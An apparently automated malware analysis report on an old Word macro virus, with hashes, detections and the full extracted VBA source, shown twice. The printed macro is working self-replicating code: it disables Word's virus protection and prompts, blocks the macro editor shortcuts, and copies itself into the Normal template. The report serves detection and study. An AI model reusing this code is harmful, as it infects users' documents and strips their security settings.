Office (OLE) malware analysis — malicious · 9132cdfb08bb1eb2

MALICIOUS

Office (OLE)

27.5 KB Created: 1999-08-04 07:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4a8b232484856c189f233dbb86147d6d SHA-1: 8ea4d712c33d429e5fa004da96dce1a5882da0d6 SHA-256: 9132cdfb08bb1eb2f014be21e10c9bedf61587b3797fc58f77c380c6647af4b8

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros that attempt to disable security features and export the macro code itself to a file. The specific export path is constructed using Application.Path & ".SHS", which is a suspicious action. The ClamAV detection 'Doc.Trojan.FS-13' further supports the malicious nature of the file.

Heuristics 2

ClamAV: Doc.Trojan.FS-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-13
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1235 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1235 bytes
SHA-256: `0f87878b60d5d4c9e2a9fd4a676ff32fe901a2486abfd033fbfbb539e27e8f7d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Fancy" 'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy Sub DocClose() Const ι = "Fancy": On Error Resume Next Options.VirusProtection = &H0 Options.SaveNormalPrompt = &H0 Options.ConfirmConversions = &H0 Application.EnableCancelKey = &H0 If ActiveDocument.Path = "" Then GoTo 0 CommandBars("Tools").Controls(12).Visible = &H0 KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" " KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" " If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS" If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS" If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS" 0 ActiveDocument.Close: End Sub Sub FileClose(): DocClose: End Sub

SHA-256: 0f87878b60d5d4c9e2a9fd4a676ff32fe901a2486abfd033fbfbb539e27e8f7d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fancy"
'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy
Sub DocClose()
Const ι = "Fancy": On Error Resume Next
Options.VirusProtection = &H0
Options.SaveNormalPrompt = &H0
Options.ConfirmConversions = &H0
Application.EnableCancelKey = &H0
If ActiveDocument.Path = "" Then GoTo 0
CommandBars("Tools").Controls(12).Visible = &H0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS"
If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS"
If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS"
0 ActiveDocument.Close: End Sub
Sub FileClose(): DocClose: End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.